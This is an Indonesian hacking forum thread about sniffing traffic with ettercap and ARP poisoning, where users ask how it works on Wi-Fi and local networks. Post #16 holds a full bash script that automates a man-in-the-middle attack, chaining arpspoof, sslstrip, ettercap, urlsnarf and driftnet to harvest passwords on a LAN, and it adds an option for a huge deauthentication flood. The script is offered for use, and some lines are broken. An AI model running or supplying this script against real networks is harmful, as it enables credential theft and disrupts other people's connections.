Snifer dengan ettercap & arp poisoning( MITM attack )
#11
klo snif di jaringan wlan gmna om? ada yg mau sharekah?

#12
(09-23-2011, 02:11 AM)betefive Wrote: klo snif di jaringan wlan gmna om? ada yg mau sharekah?

tinggal ganti interfacenya aja om, yg di contoh eth0, kalo wlan yah ubah ke interface wlan om, umumnya wlan interfacenya wlan0, bisa om cek dengan perintah ifconfig Big Grin

#13
bang zee tanyanih..., tu berarti kita harus da dalam 1 jaringan LAN sama kompi tartget ya??

#14
(09-23-2011, 03:45 PM)Alsad91 Wrote: bang zee tanyanih..., tu berarti kita harus da dalam 1 jaringan LAN sama kompi tartget ya??

iya bener bro.. sniff tersebut bahkan hanya berlaku dalam satu jaringan local saja .. yaitu satu jaringan lan seperti yang brobilang

#15
patut di coba nie om... ane kasi raid 5 deh om

#16
kalo misal pake script ni bisandak ya???


[shcode=bash]#!/bin/bash

# Script egharts.sh
# Script ini menggunakan Nmap,Arpspoof, SSLStrip, Ettercap, Urlsnarf ,Driftnet
# Script ini ane dedikasikan untuk egha yang selalu berada di samping zee disaat kesusahan
# Tested on BT4 R2
# BY zee eichel.
# Ver 0.1

#variable intro
luv1="[\e[01;38mw\e[00m]"
luv2="[\e[01;32mx\e[00m]"
luv3="[\e[01;34mi\e[00m]"
luv4="[\e[01;30m?\e[00m]"

#variable ip
gwBgt1="`ip route list | grep "default" | cut -d " " -s -f 5`"
gwBgt2="`ip addr show dev $gwBgt1 | awk '/ether/{ print $2 }'`"
gwBgt3="`ip route list | grep "default" | cut -d" " -f3`"
gwBgt4="`arping -I $gwBgt1 -f $gwBgt3| grep "Unicast" | cut -d" " -f5 | cut -d"[" -f2 | cut -d"]" -f1`"
gwBgt5="`ifconfig | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`" > /dev/null

# Intro gw .. jgn di apus please ... Tongue
echo -e "$luv3 |============================v.0.1==============================|"
echo -e "$luv3 | |"
echo -e "$luv3 | Egharts V0,1 Beta |"
echo -e "$luv3 | Created By Zee Eichel |"
echo -e "$luv3 | Dedicated T Egha |"
echo -e "$luv3 | |"
echo -e "$luv3 | Home : www[dot]id-backtrack[dot]com |"
echo -e "$luv3 | Email Me : [email protected] |"
echo -e "$luv3 | |"
echo -e "$luv3 | Tested on BT4 R2 |"
echo -e "$luv3 | |"
echo -e "$luv3 |============================0000===============================|"
echo -e "$luv3 | |"
echo -e "$luv3 |Tools ini merupakan tools autosniff password https ditambah |"
echo -e "$luv3 |dengan deauth attack |"
echo -e "$luv3 | |"
echo -e "$luv3 |Thx To All Staff on tecon-crew.org & indonesianhacker.or.id |"
echo -e "$luv3 |Greats for all staff and member at indonesian backtrack team |"
echo -e "$luv3 | |"
echo -e "$luv3 |Long live linux and fuck wi**o*s |"
echo -e "$luv3 | |"
echo -e "$luv3 |My Best Friend At This World ... |"
echo -e "$luv3 | |"
echo -e "$luv3 |jimmyromanticdevil, cassaprodigy, aip_zenzacky, jurank_dankkal,|"
echo -e "$luv3 |shadowsmaker, angga, phoni3x, _a17z_, devilnay, andre_corleone,|"
echo -e "$luv3 |guitarisnoise, ne0d4rkfl00der, bobyhikaru, mr.fribo, josh_ali |"
echo -e "$luv3 | |"
echo -e "$luv3 |==========================USAGE================================|"
echo -e "$luv3 | |"
echo -e "$luv3 |Ketik [get] untuk menyerang 1 target |"
echo -e "$luv3 |Tekan [enter] untuk seluruh target |"
echo -e "$luv3 |Tekan[destroy] untuk mengirim serangan deauth |"
echo -e "$luv3 |===============================================================|"
echo ""
echo -e "$luv3 Info System: IP:$gwBgt5, MAC:$gwBgt4, GW:$gwBgt3, LanCard:$gwBgt1"
echo ""
echo -e "$luv scanning $gwBgt3/24 execute....."
nmap -sP $gwBgt3/24 | grep "[0-9].[0-9].[0-9].[0-9]"
echo ""
echo ""
echo -e "$luv2 IP Forwarding...............done!"
echo -e "$luv2 Destination port to 80......done!"

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof

echo -n -e "$luv4 Apakah ente mau nyerang satu kompi atau seluruh network atau pengen ancurin aja sekalian? ";
read racun
if [ "$racun" == "get" ] ; then
echo
echo -e '\E[30;42m'"<==racun disiapkan==>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"IP target lo : "; tput sgr0
read gh41
echo -n -e '\E[30;47m'"Gateway target lo: "; tput sgr0
read gh42
echo -n -e '\E[37;44m'" tipe Interface yang lo gunakan:$gwBgt1 "; tput sgr0
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$gwBgt1' -t '$gh41' '$gh42'' &

elif [ "$racun" == "destroy" ] ; then
echo
echo -e '\E[30;40m'"<==deauth attack disiapkan==>"; tput sgr0
echo '------------------------'
echo -n -e '\E[33;41m'"Mac address target lo : "; tput sgr0
read gh43echo "$luv3 |Set Gateway to $gh42..ok |"


xterm -fg green4 -bg grey0 -e 'aireplay-ng --deauth 10000000000 -a $gh43 -c ff:ff:ff:ff:ff:ff eth0' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read gh42

echo -n -e '\E[37;44m'"Masukin tipe Interface lo:$gwBgt1 "; tput sgr0

xterm -fg green4 -bg grey0 -e 'arpspoof -i '$gwBgt1' '$gh42'' &

fi

# UNTUK SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# UNTUK ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$gwBgt1'' &

# UNTUK URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$gwBgt1' | grep http > urlsnarf_log.txt' &

# DRIFTNET
driftnet -p -i $gwBgt1 &[/shcode]

#17
gak bisa ya klo di jaringan mikrotik yang login di browser
???

#18
(09-24-2011, 03:37 PM)Alsad91 Wrote: kalo misal pake script ni bisandak ya???

script ane yang udah lama .. waktu itu untuk backtrack IV

(11-14-2012, 09:04 PM)akayama Wrote: gak bisa ya klo di jaringan mikrotik yang login di browser
???

hmm klo menurut ane sih klo sudah dapat hak ases bisa2 saja ...

FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#19
apa cara ini tidak work lagi pada BT5 r3???
mohon pencerahan...
thanks Big Grin






Users browsing this thread: 1 Guest(s)